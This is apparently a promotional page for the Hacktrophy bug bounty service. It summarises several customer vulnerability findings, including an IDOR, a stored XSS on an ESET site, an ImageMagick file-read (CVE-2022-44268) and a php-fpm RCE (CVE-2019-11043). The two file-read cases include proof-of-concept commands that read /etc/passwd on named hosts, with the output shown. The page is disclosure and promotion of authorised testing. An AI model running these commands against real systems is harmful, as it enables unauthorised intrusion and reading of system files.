Real-life

                  scenarios








How Hacktrophy helped our customers to reveal critical vulnerabilities

The main advantage of bug bounty programs over traditional penetration tests and security audits:

  • Penetration tests are one-time security evaluations of the system or application to a specific date (unfortunately, only a few customers do regular penetration testing)
  • Ethical hackers in bug bounty programs are looking for security vulnerabilities regularly - in case of any new public vulnerability, they automatically rescan all applications registered in the bounty programs to check if they are affected by the given vulnerability.
  • They have the maximum incentive to reveal the given vulnerability as the first ones to receive bounty

Two successful hacks of customer applications

 

Disclaimer:  The customer explicitly agreed with publishing their findings

1. Account Takeover (IDOR)

`

Direct object reference with significant impact

 

2. Stored XSS in https://parentalcontrol.eset.com

It's possible to execute arbitrary JavaScript via stored XSS on https://parentalcontrol.eset.com by sending a crafted request to https://edf.eset.com/edf (API used by the mobile app). The payload is executed after clicking the Remove button in the "Rules -> Exception" section.

 

Impact

It's possible to impersonate the user logged into the parental control "parent" UI by executing arbitrary JavaScript. This effectively leads to vertical privilege escalation.

app.hacktrophy.com hack using LFI (local file inclusion) via vulnerable ImageMagick library

hacktrophy is vulnerable to local file inclusion (LFI), due to an outdated version of ImageMagick being used (CVE-2022-44268).
Proof-of-Concept:
Log into app.hacktrophy.com and upload the attached `poc.png` as profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). 
Finally, run...
$ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync

 

Hack of cloud.nethemba.com via RCE via php-fpm

Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043: PoC
wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-

 

 

output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

...

Lessons learned

 

The hackers could spot the given vulnerabilities immediately (there is a direct incentive to be the first one), often before official security patches were released.

 

Thanks to the Hacktrophy Bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.

Remember:

 

 

 

 

 

 

 

 

 

One thousand white hat hackers are usually faster than one black hat hacker.